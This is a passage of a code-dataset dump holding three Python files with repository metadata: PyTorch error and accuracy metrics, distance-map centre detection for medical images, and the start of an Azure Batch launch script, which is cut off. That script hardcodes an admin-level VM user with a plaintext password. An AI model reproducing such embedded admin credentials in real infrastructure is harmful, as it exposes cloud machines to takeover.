computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n \"\"\"\n if mask is None:\n return (x - y).abs().mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n z = (x - y) * mask\n z = z.abs()\n return z.sum(dim=(0,) + dim_tuple(x)[2:]) / (mask_nnz * x.size(0))\n\n\n@torch.no_grad()\ndef rmse_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the root mean squared error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n \"\"\"\n # Note: We want to return the mean of the RMSE over the samples,\n # which means we need to take that mean after the square root.\n if mask is None:\n return ((x - y)**2).mean(dim=dim_tuple(x)[1:]).sqrt().mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n z = ((x - y)**2) * mask\n z = z.sum(dim=(dim_tuple(x)[2:])) / mask_nnz\n z.sqrt_()\n return z.mean(dim=0)\n\n\n@torch.no_grad()\ndef nrmse_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the normalized root mean squared error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n This will normalize using the range of each sample in y.\n\n \"\"\"\n if mask is None:\n dim = dim_tuple(x)[1:]\n rmse = ((x - y)**2).mean(dim=dim).sqrt()\n nrmse = rmse / (y.amax(dim=dim) - y.amin(dim=dim))\n return nrmse.mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n dim = dim_tuple(x)[2:]\n z = ((x - y)**2) * mask\n rmse = (z.sum(dim=dim) / mask_nnz).sqrt()\n nrmse = rmse / (y.amax(dim=dim) - y.amin(dim=dim))\n return nrmse.mean(dim=0)\n\n\n@torch.no_grad()\ndef prcntclose_metric(x, y, mask=None, mask_nnz=None, atol=1e-8, rtol=0.01,\n mask_tol=None):\n \"\"\"Compute the percent of values that are 'close'.\n\n This essentially is an element-wise allclose.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n If mask_tol is not None, it will be used to scale rtol at each\n point.\n\n \"\"\"\n if mask_tol is not None:\n close = (x - y).abs() <= atol + rtol*mask_tol*y.abs()\n else:\n close = (x - y).abs() <= atol + rtol*y.abs()\n if mask is None:\n return close.sum() / close.numel() * 100\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n close = close * mask\n return close.sum(dim=(0,) + dim_tuple(close)[2:]) / (mask_nnz * x.size(0)) * 100\n\n\n@torch.no_grad()\ndef topk_accuracy_metric(x: torch.Tensor, y: torch.Tensor, k: int) -> torch.Tensor:\n \"\"\"Compute the top-k accuracy of x using y.\"\"\"\n _, pred = x.topk(k, 1, True, True)\n pred = pred.t()\n correct = pred.eq(y.view(1, -1).expand_as(pred))\n correct_k = correct[:k].float().sum()\n correct_k.mul_(100.0 / x.size(0))\n return correct_k\n\n\nclass MetricManager:\n \"\"\"Manages applying and tracking metrics.\"\"\"\n\n def __init__(self, metric_names, criterion, n, prcntclose=None,\n prcntclose_tol_scale=None, allreduce=True, mask=None):\n \"\"\"Initialize the metric manager with a list of metrics and mask.\"\"\"\n metrics_map = {\n 'mse': mse_metric,\n 'mae': mae_metric,\n 'rmse': rmse_metric,\n 'nrmse': nrmse_metric,\n 'top1': functools.partial(topk_accuracy_metric, k=1),\n 'top5': functools.partial(topk_accuracy_metric, k=5)\n }\n if prcntclose_tol_scale and not mask:\n raise ValueError('Must give a mask to use --prcntclose-tol-scale')\n if mask:\n self.mask = load_region_mask(mask).to(get_cuda_device())\n self.mask_nnz = self.mask.sum(dim=dim_tuple(self.mask)[1:])\n else:\n self.mask = None\n self.mask_nnz = None\n if prcntclose_tol_scale:\n # Load mask again, unexpanded.\n mask_unexp = load_region_mask(mask, expand=False)\n num_regions = torch.unique(mask_unexp).numel()\n # Pad scaling if there's not enough elements.\n if len(prcntclose_tol_scale) != num_regions:\n prcntclose_tol_scale += [1.0] * (num_regions - len(prcntclose_tol_scale))\n self.mask_tol = torch.zeros(mask_unexp.size())\n for i in range(num_regions):\n indices = mask_unexp == i\n self.mask_tol[indices] = prcntclose_tol_scale[i]\n self.mask_tol = self.mask_tol.to(get_cuda_device())\n else:\n self.mask_tol = None\n mask_metrics_map = {\n 'mask-mse': functools.partial(mse_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n 'mask-mae': functools.partial(mae_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n 'mask-rmse': functools.partial(rmse_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n 'mask-nrmse': functools.partial(nrmse_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n }\n if prcntclose is None:\n prcntclose = []\n for prcnt in prcntclose:\n metrics_map[f'prcntclose{prcnt*100}'] = functools.partial(\n prcntclose_metric, rtol=prcnt)\n mask_metrics_map[f'mask-prcntclose{prcnt*100}'] = functools.partial(\n prcntclose_metric, mask=self.mask, mask_nnz=self.mask_nnz,\n rtol=prcnt)\n if self.mask_tol is not None:\n metrics_map[f'prcntclose{prcnt*100}s'] = functools.partial(\n prcntclose_metric, rtol=prcnt, mask_tol=self.mask_tol)\n mask_metrics_map[f'mask-prcntclose{prcnt*100}s'] = functools.partial(\n prcntclose_metric, mask=self.mask, mask_nnz=self.mask_nnz,\n rtol=prcnt, mask_tol=self.mask_tol)\n if 'all' in metric_names:\n metric_names = list(metrics_map.keys())\n if self.mask is not None:\n metric_names += list(mask_metrics_map.keys())\n # Add the right prcntclose entries.\n if 'prcntclose' in metric_names and prcntclose:\n metric_names.remove('prcntclose')\n metric_names += [f'prcntclose{prcnt*100}' for prcnt in prcntclose]\n if self.mask_tol is not None:\n metric_names += [f'prcntclose{prcnt*100}s' for prcnt in prcntclose]\n if 'mask-prcntclose' in metric_names and prcntclose:\n metric_names.remove('mask-prcntclose')\n metric_names += [f'mask-prcntclose{prcnt*100}' for prcnt in prcntclose]\n if self.mask_tol is not None:\n metric_names += [f'mask-prcntclose{prcnt*100}s' for prcnt in prcntclose]\n self.metrics = {}\n self.metric_trackers = {}\n for metric in metric_names:\n if metric in metrics_map:\n self.metrics[metric] = metrics_map[metric]\n self.metric_trackers[metric] = AverageTrackerDevice(\n n, get_cuda_device(), allreduce=allreduce)\n elif metric in mask_metrics_map:\n if self.mask is None:\n raise ValueError('Must provide mask for masked metrics')\n self.metrics[metric] = mask_metrics_map[metric]\n self.metric_trackers[metric] = AverageTrackerDevice(\n n, get_cuda_device(), allreduce=allreduce,\n shape=(self.mask.size(0),))\n else:\n raise ValueError('Unknown metric ' + metric)\n self.metrics['loss'] = criterion\n self.metric_trackers['loss'] = AverageTrackerDevice(\n n, get_cuda_device(), allreduce=allreduce)\n self.metric_vals = {}\n self.reset()\n\n def reset(self):\n \"\"\"Clear tracking information for metrics.\"\"\"\n self.metric_vals = {}\n for tracker in self.metric_trackers.values():\n tracker.reset()\n\n def compute_metrics(self, output, targets):\n \"\"\"Compute and save all metrics.\"\"\"\n self.metric_vals = {\n metric: self.metrics[metric](output, targets)\n for metric in self.metrics\n }\n\n def update_trackers(self, count=1.0):\n \"\"\"Update metric trackers.\"\"\"\n for metric, val in self.metric_vals.items():\n self.metric_trackers[metric].update(val, count)\n\n def get_metric_means(self):\n \"\"\"Return a dict with the mean values of each metric.\"\"\"\n return {\n metric: self.metric_trackers[metric].mean()\n for metric in self.metrics\n }\n\n def log_metrics(self, log, indent=0, prefix='', metrics=None):\n \"\"\"Log the mean values of each metric.\n\n If provided, uses metrics for the values rather than computing\n them.\n\n \"\"\"\n start = ' ' * indent + prefix\n metric_vals = metrics\n if not metric_vals:\n metric_vals = {\n metric: tracker.mean()\n for metric, tracker in self.metric_trackers.items()\n }\n for metric, mean in metric_vals.items():\n if isinstance(mean, list):\n mean_fmt = ', '.join(f'{m:.5f}' for m in mean)\n log.log(start + ' ' + metric + ': ' + mean_fmt)\n else:\n log.log(start + f' {metric}: {mean:.5f}')\n","repo_name":"spcl/smoe","sub_path":"smoe/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"21433807843","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PolarVW.UTL import croppatch,fillpatch\nfrom scipy.ndimage import gaussian_filter\nimport copy\nimport cv2\n\n\ndef min_dist(ptx, pty, mask, direction):\n deltax = np.cos(direction / 180 * np.pi)\n deltay = np.sin(direction / 180 * np.pi)\n dist = 0\n cval = mask[pty, ptx]\n while cval > 0:\n ptx += deltax\n pty += deltay\n dist += 1\n cval = mask[int(round(pty)), int(round(ptx))]\n\n return dist\n\n\ndef min_dist_pt(ptx, pty, mask):\n cdist = np.inf\n for di in range(0, 360, 45):\n cdist = min(cdist, min_dist(ptx, pty, mask, di))\n return cdist\n\n\ndef get_min_dist_map(mask):\n min_dist_map = []\n deltax = [1, 1, 0, -1, -1, -1, 0, 1]\n deltay = [0, 1, 1, 1, 0, -1, -1, -1]\n for i in range(len(deltax)):\n # print('dir',deltax[i],deltay[i])\n min_dist_map.append(get_min_dist_dir_map(mask, deltax[i], deltay[i]))\n return np.moveaxis(np.array(min_dist_map), 0, 2)\n\n\ndef get_min_dist_dir_map(mask, deltax, deltay):\n min_dist_map = np.zeros(mask.shape)\n maskregion = np.where(mask > 0)\n min_dist_map[maskregion] = -1\n # deltax = int(np.ceil(np.cos(direction / 180 * np.pi)))\n # deltay = int(np.ceil(np.sin(direction / 180 * np.pi)))\n delta = np.sqrt(deltax * deltax + deltay * deltay)\n for pi in range(maskregion[0].shape[0]):\n cpty = maskregion[0][pi]\n cptx = maskregion[1][pi]\n if min_dist_map[cpty][cptx] == -1:\n # print('pt',cpty,cptx)\n # extract one line\n step = 0\n extx = cptx\n exty = cpty\n steps = []\n ptxy = []\n while step < mask.shape[0] * 1.42 and min_dist_map[exty][extx] == -1:\n ptxy.append([extx, exty])\n steps.append(step)\n step += 1\n extx = cptx + deltax * step\n exty = cpty + deltay * step\n\n largeststep = min_dist_map[exty][extx] + step * delta\n # print(extx,exty,min_dist_map[exty][extx],largeststep)\n # paint min_dist_map along the line\n for cstepi in range(len(steps)):\n cstep = steps[cstepi]\n cdist = largeststep - cstep * delta\n extx = ptxy[cstepi][0]\n exty = ptxy[cstepi][1]\n min_dist_map[exty][extx] = cdist\n # print('pt', extx, exty, cdist)\n\n return min_dist_map\n\n\ndef find_nms_center(dist_map, fig=0):\n rad = 3\n nms_dist_map = copy.copy(dist_map)\n nms_dist_map = gaussian_filter(nms_dist_map, sigma=3)\n if fig:\n nms_dist_map_p = np.zeros((nms_dist_map.shape[0], nms_dist_map.shape[1], 3), dtype=np.uint8)\n nms_dist_map_p[:, :, 0] = dist_map / np.max(dist_map) * 255\n\n thres = np.max(nms_dist_map) * 0.5\n nz = np.where(dist_map > thres)\n min_ct_dist_thres = 40\n nms_centers = {}\n for pi in range(nz[0].shape[0]):\n pty = nz[0][pi]\n ptx = nz[1][pi]\n if pty < rad or ptx < rad:\n continue\n mn = np.max(nms_dist_map[pty - rad:pty + rad + 1, ptx - rad:ptx + rad + 1])\n if nms_dist_map[pty, ptx] == mn:\n has_nei_ct_higher = False\n for cti in list(nms_centers.keys()):\n eptx = int(cti.split('-')[0])\n epty = int(cti.split('-')[1])\n ethres = nms_centers[cti]\n if pow(eptx - ptx, 2) + pow(epty - pty, 2) < pow(min_ct_dist_thres, 2):\n if ethres > mn:\n #print(ptx, pty, mn, 'smaller than', cti, ethres)\n has_nei_ct_higher = True\n else:\n nms_centers['%d-%d' % (ptx, pty)] = mn\n del nms_centers[cti]\n #else:\n # print(np.sqrt(pow(eptx - ptx, 2) + pow(eptx - ptx, 2)), 'over', min_ct_dist_thres)\n if has_nei_ct_higher == False:\n nms_centers['%d-%d' % (ptx, pty)] = mn\n\n # if fig:\n # plt.imshow(nms_dist_map_p / np.max(nms_dist_map_p))\n # plt.show()\n if fig:\n for cti in nms_centers.keys():\n ptx = int(cti.split('-')[0])\n pty = int(cti.split('-')[1])\n nms_dist_map_p[pty - 5:pty + 6, ptx - 1:ptx + 2, 1] = 255\n nms_dist_map_p[pty - 1:pty + 2, ptx - 5:ptx + 6, 1] = 255\n if fig:\n return nms_centers, nms_dist_map_p\n else:\n return nms_centers\n\ndef find_con_region(dist_map, fig=0):\n DEBUG = 0\n nms_dist_map = copy.copy(dist_map)\n nms_dist_map = gaussian_filter(nms_dist_map, sigma=3)\n if fig:\n nms_dist_map_p = np.zeros((nms_dist_map.shape[0], nms_dist_map.shape[1], 3), dtype=np.uint8)\n nms_dist_map_p[:, :, 0] = dist_map / np.max(dist_map) * 255\n\n # connected region\n nms_dist_map_int = (nms_dist_map / np.max(nms_dist_map) * 255).astype(np.uint8)\n ret, thresh = cv2.threshold(nms_dist_map_int, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n connectivity = 4\n output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)\n # The first cell is the number of labels\n num_labels = output[0]\n # The second cell is the label matrix\n complabel = output[1]\n # The third cell is the stat matrix\n stats = output[2]\n if DEBUG:\n plt.imshow(complabel)\n plt.colorbar()\n plt.show()\n # map from label id to bb around component\n component_bbs = []\n for pti in range(num_labels):\n if pti == complabel[0, 0]:\n continue\n component_pixels = stats[pti, -1]\n if component_pixels < 100:\n #print('connected region', component_pixels,'ignore')\n continue\n cbb = find_component_bb(complabel, pti, nms_dist_map)\n component_bbs.append(cbb)\n if fig:\n for cti in component_bbs:\n ptx = int(round(cti.x))\n pty = int(round(cti.y))\n nms_dist_map_p[pty - 5:pty + 6, ptx - 1:ptx + 2, 1] = 255\n nms_dist_map_p[pty - 1:pty + 2, ptx - 5:ptx + 6, 1] = 255\n if fig:\n nms_dist_map_p[:,:,2] = complabel\n return component_bbs, nms_dist_map_p\n else:\n return component_bbs\n\n# find center\ndef gen_2d_gaussion(size, sigma=1, mu=0):\n x, y = np.meshgrid(np.linspace(-1, 1, size), np.linspace(-1, 1, size))\n d = np.sqrt(x * x + y * y)\n g = np.exp(-((d - mu) ** 2 / (2.0 * sigma ** 2)))\n return g\n\n\n# predict multiple min dist map and average\ndef multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth):\n search_patch_rz_batch = []\n stride = 10\n rg = 2\n DEBUG = 0\n for ofi in np.arange(-rg, rg + 1):\n for ofj in np.arange(-rg, rg + 1):\n octyof = octy + ofi * stride\n octxof = octx + ofj * stride\n searchpatch = croppatch(dicomslice, octyof, octxof, patchheight, patchwidth)\n searchpatchrz = cv2.resize(searchpatch, (0, 0), fx=4, fy=4)\n searchpatchrz = searchpatchrz/np.max(searchpatchrz)\n # searchpatchrz = searchpatch\n search_patch_rz_batch.append(searchpatchrz)\n '''plt.imshow(searchpatchrz)\n plt.title('Original Patch'+str(octyof)+str(octxof))\n plt.show()'''\n\n search_patch_rz_batch = np.array(search_patch_rz_batch)\n min_dist_search_patch_batch = min_dist_cnn.predict(search_patch_rz_batch[:, :, :, None])[:, :, :, 0]\n min_dist_search_patch = []\n for i in range(min_dist_search_patch_batch.shape[0]):\n ofi = i // (2 * rg + 1) - rg\n ofj = i % (2 * rg + 1) - rg\n # print(ofi,ofj)\n offpred = croppatch(min_dist_search_patch_batch[i], 256 - ofi * stride * 4, 256 - ofj * stride * 4, 256,\n 256)\n # offpred = croppatch(min_dist_search_patch_batch[i], 256 - ofi * stride, 256 - ofj * stride, 256, 256)\n if DEBUG:\n plt.suptitle('Original Patch'+str(ofi)+str(ofj))\n plt.subplot(1,3,1)\n plt.imshow(search_patch_rz_batch[i])\n plt.subplot(1,3,2)\n plt.imshow(min_dist_search_patch_batch[i])\n plt.subplot(1,3,3)\n plt.imshow(offpred)\n #plt.colorbar()\n plt.show()\n print(np.max(offpred))\n min_dist_search_patch.append(offpred / np.max(offpred))\n min_dist_search_patch = np.array(min_dist_search_patch)\n min_dist_search_patch = np.max(min_dist_search_patch, axis=0)\n # plt.imshow(min_dist_search_patch)\n return min_dist_search_patch\n\ndef multi_min_dist_pred(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth, kernelmask=None):\n min_dist_search_patch = multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth)\n if kernelmask is None:\n kernelmask = gen_2d_gaussion(min_dist_search_patch.shape[0], 0.5)\n dist_pred_ct, nms_dist_map_p = find_nms_center(min_dist_search_patch * kernelmask, fig=1)\n search_patch_center = croppatch(dicomslice, octy, octx, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n #print('map max',np.max(search_patch_center_rz))\n nms_dist_map_p[:, :, 2] = search_patch_center_rz * 255\n\n cts = [[int(i.split('-')[0]), int(i.split('-')[1])] for i in list(dist_pred_ct.keys())]\n\n if len(cts) == 0:\n print('no ct')\n elif len(cts) != 1:\n pass\n #print('cts', len(cts))\n return cts, nms_dist_map_p\n\ndef multi_min_dist_pred_withinbb(min_dist_cnn, dicomslice, bb, patchheight, patchwidth):\n SCALE = 4\n octy = bb.y\n octx = bb.x\n ENL = 1.2\n min_dist_search_patch = multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth)\n min_dist_search_patch_rz = croppatch(min_dist_search_patch,min_dist_search_patch.shape[1]/2,min_dist_search_patch.shape[0]/2,bb.h/2*SCALE*ENL,bb.w/2*SCALE*ENL)\n min_dist_search_patch_rz = fillpatch(np.zeros(min_dist_search_patch.shape),min_dist_search_patch_rz)\n #plt.imshow(min_dist_search_patch_rz)\n #plt.show()\n\n #all cts\n dist_pred_ct, nms_dist_map_p = find_nms_center(min_dist_search_patch_rz, fig=1)\n #cts = [[int(i.split('-')[0]), int(i.split('-')[1])] for i in list(dist_pred_ct.keys())]\n\n nms_dist_map = nms_dist_map_p[:,:,0]\n #remove cts in unconnected region\n nms_dist_map_int = (nms_dist_map / np.max(nms_dist_map) * 255).astype(np.uint8)\n ret, thresh = cv2.threshold(nms_dist_map_int, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n connectivity = 4\n output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)\n # The second cell is the label matrix\n component_label = output[1]\n #plt.imshow(component_label)\n #plt.show()\n\n center_component_label = component_label[256,256]\n cts = []\n for i in dist_pred_ct:\n if component_label[int(i.split('-')[1]), int(i.split('-')[0])] != center_component_label:\n #print('ignore unconnected nms ct')\n continue\n cts.append([int(i.split('-')[0]), int(i.split('-')[1])])\n\n search_patch_center = croppatch(dicomslice, octy, octx, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n nms_dist_map_p[:, :, 2] = search_patch_center_rz / np.max(search_patch_center_rz) * 255\n\n if len(cts) == 0:\n #print('no ct')\n pass\n elif len(cts) != 1:\n pass\n '''print('cts', len(cts))\n plt.subplot(1,2,1)\n plt.title('component_label')\n plt.imshow(component_label)\n plt.subplot(1, 2, 2)\n plt.title('nms_dist_map_p')\n plt.imshow(nms_dist_map_p)\n plt.show()'''\n return cts, nms_dist_map_p\n\ndef find_component_bb(complabel, labelid, nms_dist_map):\n ypos, xpos = np.where(complabel == labelid)\n xmin = np.min(xpos)\n xmax = np.max(xpos)\n ymin = np.min(ypos)\n ymax = np.max(ypos)\n mapval = []\n for i in range(len(ypos)):\n mapval.append(nms_dist_map[ypos[i],xpos[i]])\n c = np.mean(mapval)\n #min_dist_prob_region = nms_dist_map_p[ymin:ymax,xmin:xmax]\n return BB.fromminmax(xmin, xmax, ymin, ymax, c, [c])\n\ndef multi_min_dist_pred_component(min_dist_cnn, dicomslice, bb, patchheight, patchwidth, kernelmask=None):\n #min_dist_search_patch = multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth)\n cts, nms_dist_map_p = multi_min_dist_pred_withinbb(min_dist_cnn, dicomslice,bb, 64, 64)\n min_dist_search_patch = nms_dist_map_p[:, :, 0]\n if kernelmask is None:\n kernelmask = gen_2d_gaussion(min_dist_search_patch.shape[0], 0.5)\n component_bbs, nms_dist_map_p = find_con_region(min_dist_search_patch * kernelmask, fig=1)\n #prepare output img\n search_patch_center = croppatch(dicomslice, bb.y, bb.x, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n # print('map max',np.max(search_patch_center_rz))\n nms_dist_map_p[:, :, 2] = search_patch_center_rz * 255\n return component_bbs, nms_dist_map_p\n\ndef multi_min_dist_pred_component_all(min_dist_cnn, dicomslice, bb, patchheight, patchwidth, kernelmask=None):\n cts, nms_dist_map_p = multi_min_dist_pred(min_dist_cnn, dicomslice, bb.y, bb.x, 64, 64)\n min_dist_search_patch = nms_dist_map_p[:, :, 0]\n if kernelmask is None:\n kernelmask = gen_2d_gaussion(min_dist_search_patch.shape[0], 0.5)\n component_bbs, nms_dist_map_p = find_con_region(min_dist_search_patch * kernelmask, fig=1)\n # prepare output img\n search_patch_center = croppatch(dicomslice, bb.y, bb.x, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n # print('map max',np.max(search_patch_center_rz))\n #nms_dist_map_p[:, :, 2] = search_patch_center_rz * 255\n return component_bbs, nms_dist_map_p\n\n# find label id from thresholded min dist map for nms centers, and bb around each connected component\ndef labelcts(nms_dist_map_p, nms_centers):\n ret, thresh = cv2.threshold(nms_dist_map_p, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n connectivity = 4\n output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)\n complabel = output[1]\n # plt.imshow(complabel)\n # component label id for each nms centers\n component_label_ids = []\n # map from label id to bb around component\n component_bbs = {}\n for pti in nms_centers:\n component_label_ids.append(complabel[pti[1], pti[0]])\n if complabel[pti[1], pti[0]] not in component_bbs:\n component_bbs[complabel[pti[1], pti[0]]] = find_component_bb(complabel, complabel[pti[1], pti[0]],nms_dist_map_p)\n return component_label_ids, component_bbs\n\n\nfrom PolarVW.BB import BB\ndef mergects(nms_dist_map_p, nms_centers):\n # threshold and connected component, if cts in the same region, merge\n component_label_ids, component_bbs = labelcts(nms_dist_map_p, nms_centers)\n label_id_cts = {} # map from label id to array of contours\n for cti in range(len(nms_centers)):\n if component_label_ids[cti] not in label_id_cts:\n label_id_cts[component_label_ids[cti]] = []\n label_id_cts[component_label_ids[cti]].append(nms_centers[cti])\n mcts = []\n for labeli in label_id_cts:\n mct = np.mean(np.array(label_id_cts[labeli]), axis=0).tolist()\n #mbb = component_bbs[labeli]\n #print('mbb offset', mbb.x - mct[0], mbb.y - mct[1])\n mcts.append(mct)\n return mcts\n\n\n","repo_name":"clatfd/PolarReg","sub_path":"PolarVW/mindist.py","file_name":"mindist.py","file_ext":"py","file_size_in_byte":15661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14223505096","text":"try:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\nimport datetime\nimport os, re\n\nimport azure.storage.blob as azureblob\nimport azure.batch._batch_service_client as batch\nimport azure.batch.batch_auth as batchauth\nimport azure.batch.models as batchmodels\n\nimport PolycraftAIGym.common.helpers as helpers\nfrom AzureBatch.AgentBatchCommands import AgentType, AgentBatchCommands\n\n_CONTAINER_NAME = 'batch-workflow-fog-of-war'\n\nDEBUG_FLAG = False\n\n### SIFT ###\nAPPLICATION_ID = 'agent_sift'\nAPPLICATION_VERSION = '9'\nAPPLICATION_ID_FIXED = 'agent_sift'\nAPPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + APPLICATION_ID_FIXED + '_' + APPLICATION_VERSION\n\n### TUFTS ###\nTUFT_APPLICATION_ID = 'agent_tufts'\nTUFT_VERSION = '3'\nTUFT_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + TUFT_APPLICATION_ID + '_' + TUFT_VERSION\n### GT ###\nGT_APP_ID = 'agent_gt_pogo'\nGT_APPLICATION_VERSION = '6'\nGT_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_APP_ID + '_' + GT_APPLICATION_VERSION\n\n### GT Plan ###\nGT_PLAN_APP_ID = 'agent_gt_pogo_planner'\nGT_PLAN_APPLICATION_VERSION = '1'\nGT_PLAN_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_PLAN_APP_ID + '_' + GT_PLAN_APPLICATION_VERSION\n\n\n### GT HG ###\nGT_HUGA_APP_ID = 'agent_gt_huga_1'\nGT_HUGA_APP_VERSION = '1'\nGT_HUGA_APP_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_HUGA_APP_ID + '_' + GT_HUGA_APP_VERSION\n\n### GT HG MATLAB ###\nGT_HUGA_MLAB_APP_ID = 'agent_gt_huga_matlab'\nGT_HUGA_MLAB_APP_VERSION = '1'\nGT_HUGA_MLAB_APP_DIR = '$AZ_BATCH_APP_PACKAGE_' + GT_HUGA_MLAB_APP_ID + '_' + GT_HUGA_MLAB_APP_VERSION\n\n### SRI ###\nSRI_APP_ID = 'agent_sri'\nSRI_VERSION = '2'\nSRI_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + SRI_APP_ID + '_' + SRI_VERSION\n\n### RAYTHEON ###\nRAYTHEON_APP_ID = 'agent_raytheon' # APP ID\nRAYTHEON_VERSION = '3'\nRAYTHEON_APPLICATION_DIR = '$AZ_BATCH_APP_PACKAGE_' + RAYTHEON_APP_ID + '_' + RAYTHEON_VERSION\n\n\nAPP_DICT = {'agent_sift': APPLICATION_DIR,\n 'agent_tufts': TUFT_APPLICATION_DIR,\n 'agent_gt_pogo': GT_APPLICATION_DIR,\n 'agent_sri': SRI_APPLICATION_DIR,\n 'agent_gt_huga_1': GT_HUGA_APP_DIR,\n 'agent_gt_huga_matlab': GT_HUGA_MLAB_APP_DIR,\n 'agent_gt_pogo_planner': GT_PLAN_APPLICATION_DIR,\n 'agent_raytheon': RAYTHEON_APPLICATION_DIR,\n }\n\n# _SIMPLE_TASK_NAME = 'simple_task.py'\n# _SIMPLE_TASK_PATH = os.path.join('resources', 'simple_task.py')\n\n\nclass AzureBatchLaunchTournaments:\n\n def __init__(self, agent_name, agent_type, library_of_tournaments, global_config, pool, suffix=None):\n self.agent_name = agent_name\n self.agent_type = agent_type\n self.suffix = suffix\n self.pool = pool\n self.library_of_tournaments = library_of_tournaments\n self.global_config = global_config\n self.agent_commands = AgentBatchCommands(APP_DICT, self.agent_name, self.agent_type)\n # later self.commands = AgentBatchCommands.AgentBatchCommands(self.agent_name, self.agent_type, )\n\n def create_pool(self, batch_client, block_blob_client, vm_size, pool_id, vm_count):\n \"\"\"Creates an Azure Batch pool with the specified id.\n\n :param batch_client: The batch client to use.\n :type batch_client: `batchserviceclient.BatchServiceClient`\n :param block_blob_client: The storage block blob client to use.\n :type block_blob_client: `azure.storage.blob.BlockBlobService`\n :param str pool_id: The id of the pool to create.\n :param str vm_size: vm size (sku)\n :param int vm_count: number of vms to allocate\n \"\"\"\n # pick the latest supported 16.04 sku for UbuntuServer\n sku_to_use, image_ref_to_use = \\\n helpers.select_latest_verified_vm_image_with_node_agent_sku(\n batch_client, 'Canonical', 'UbuntuServer', '18.04')\n\n block_blob_client.create_container(_CONTAINER_NAME, fail_on_exist=False)\n\n\n application_package_references = [\n # batchmodels.ApplicationPackageReference(application_id=APPLICATION_ID, version=APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=TUFT_APPLICATION_ID, version=TUFT_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_APP_ID, version=GT_APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=SRI_APP_ID, version=SRI_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_APP_ID, version=GT_HUGA_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_MLAB_APP_ID, version=GT_HUGA_MLAB_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_PLAN_APP_ID, version=GT_PLAN_APPLICATION_VERSION),\n batchmodels.ApplicationPackageReference(application_id=RAYTHEON_APP_ID, version=RAYTHEON_VERSION),\n ]\n\n # Create User Accounts\n users = [\n batchmodels.UserAccount(\n name='azureuser',\n password='adminAcct$1',\n elevation_level=batchmodels.ElevationLevel.admin),\n # batchmodels.UserAccount(\n # name='pool-nonadmin',\n # password='******',\n # elevation_level=batchmodels.ElevationLevel.non_admin)\n ]\n\n pool = batchmodels.PoolAddParameter(\n id=pool_id,\n virtual_machine_configuration=batchmodels.VirtualMachineConfiguration(\n image_reference=batchmodels.ImageReference(\n publisher=\"Canonical\",\n offer=\"UbuntuServer\",\n sku=\"18.04-LTS\",\n version=\"latest\"\n ),\n node_agent_sku_id=\"batch.node.ubuntu 18.04\"),\n vm_size=vm_size,\n user_accounts=users,\n target_dedicated_nodes=vm_count,\n application_package_references=application_package_references,\n\n # mount_configuration=[batch.models.MountConfiguration(\n # azure_file_share_configuration=batch.models.AzureFileShareConfiguration(\n # account_name=global_config.get('Storage', 'storageaccountname'),\n # azure_file_url=\"https://polycrafttournamentdata.file.core.windows.net/pal-sift\",\n # account_key=global_config.get('Storage', 'storageaccountkey'),\n # relative_mount_path='sift_file_share')\n # ),\n # 